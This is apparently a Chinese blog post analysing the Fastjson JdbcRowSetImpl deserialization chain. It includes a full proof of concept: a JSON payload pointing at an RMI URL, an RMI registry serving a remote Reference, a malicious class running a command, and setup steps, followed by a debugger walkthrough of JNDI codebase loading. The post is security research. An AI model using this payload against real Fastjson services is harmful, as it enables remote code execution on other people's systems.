Fastjson利用链JdbcRowSetImpl分析

Byp0ss403小号

已于 2025-05-23 15:44:39 修改

阅读量452

点赞数 7

分类专栏： Java安全文章标签： fastjson Java

于 2025-05-23 15:44:31 首次发布

本文链接：https://blog.csdn.net/m0_50125527/article/details/148170016

版权

Java安全专栏收录该内容

3 篇文章

订阅专栏

首先创建客户端

package com.yq1ng.vul;

import com.alibaba.fastjson.JSON;

/**
 * FastJsonTest
 *
 * @author yq1ng
 * @date 2021/12/29 19:45
 * @since 1.0.0
 */
public class FastJsonTest {
    public static void main(String[] args) {
        String ser = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\", \"dataSourceName\":\"rmi://127.0.0.1:1099/Evil\", \"autoCommit\":true}";
        JSON.parse(ser);
    }
}

然后是jndi服务端

package com.yq1ng.vul;

import com.sun.jndi.rmi.registry.ReferenceWrapper;

import javax.naming.NamingException;
import javax.naming.Reference;
import java.rmi.AlreadyBoundException;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

/**
 * RMIServer
 *
 * @author yq1ng
 * @date 2021/12/29 19:46
 * @since 1.0.0
 */
public class RMIServer {
    public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException {
        Registry registry = LocateRegistry.createRegistry(1099);
        Reference reference = new Reference("Evil", "Evil", "http://127.0.0.1:8080/");
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
        registry.bind("Evil", referenceWrapper);
        System.out.println("Server is running...");
    }
}

接着是恶意类，注意这个恶意类不能带有包名，也就是package

import java.io.IOException;

/**
 * Evil
 *
 * @author yq1ng
 * @date 2021/12/29 19:46
 * @since 1.0.0
 */
public class Evil {
    public Evil(){
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

然后编译恶意类，并起一个python简单服务，注意python3的启动方式是python -m http.server 8080不再是python -m SimpleHTTPServer 8080

然后启动jndi服务，启动客户端即可

漏洞分析

poc是 String ser = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\", \"dataSourceName\":\"rmi://127.0.0.1:1099/Evil\", \"autoCommit\":true}"; ，从上面的反序列化流程可以知道会去调用指定类，然后调用setter，这里会调用setDataSourceName()和setAutoCommit()。

在deserialze后继续调试，断点打到了rt.jar!/com/sun/rowset/JdbcRowSetImpl.class#setDataSourceName()

这里默认的dataSource是空的，所以会设置为我们传入的恶意rmi。接着来到setAutoCommit()

这里conn为空，所以进行获取，这里形参也解释了为什么payload的autoCommit为true。跟进this.connect()

首先初始化上下文，然后开始找传入的rmi类

继续跟

首先看getRootURLContext()，全局查找的话会有四个类去调用

这里会根据不同协议去调用不同的getRootURLContext()，这里跟进rt.jar!/com/sun/jndi/url/rmi/rmiURLContext.class#getRootURLContext()

这里对传入的rmi格式进行检测，代码很长截取部分，一言不合就会抛异常。接着返回

继续跟

首先是一个判空，然后去注册中心找Evil，接着在return跟进rt.jar!/com/sun/jndi/rmi/registry/RegistryContext.classdecodeObject()

这里将构造的Reference赋值给var3，然后跟进NamingManager.java#getObjectInstance()

到这里跟进getObjectFactoryFromReference()

先从本地尝试加载Evil，如果不存在继续往下看

本地不存在的话就会尝试从codebase中加载class

什么是codebase？以下内容摘自：Java-RMI

codebase就是远程装载类的路径。当对象发送者序列化对象时，会在序列化流中附加上codebase的信息。这个信息告诉接收方到什么地方寻找该对象的执行代码。
你要弄清楚哪个设置codebase，而哪个使用codebase。任何程序假如发送一个对方可能没有的新类对象时就要设置codebase（例如jdk的类对象，就不用设置codebase）。
codebase实际上是一个url表，在该url下有接受方需要下载的类文件。假如你不设置codebase，那么你就不能把一个对象传递给本地没有该对象类文件的程序。

跟进helper.loadClass()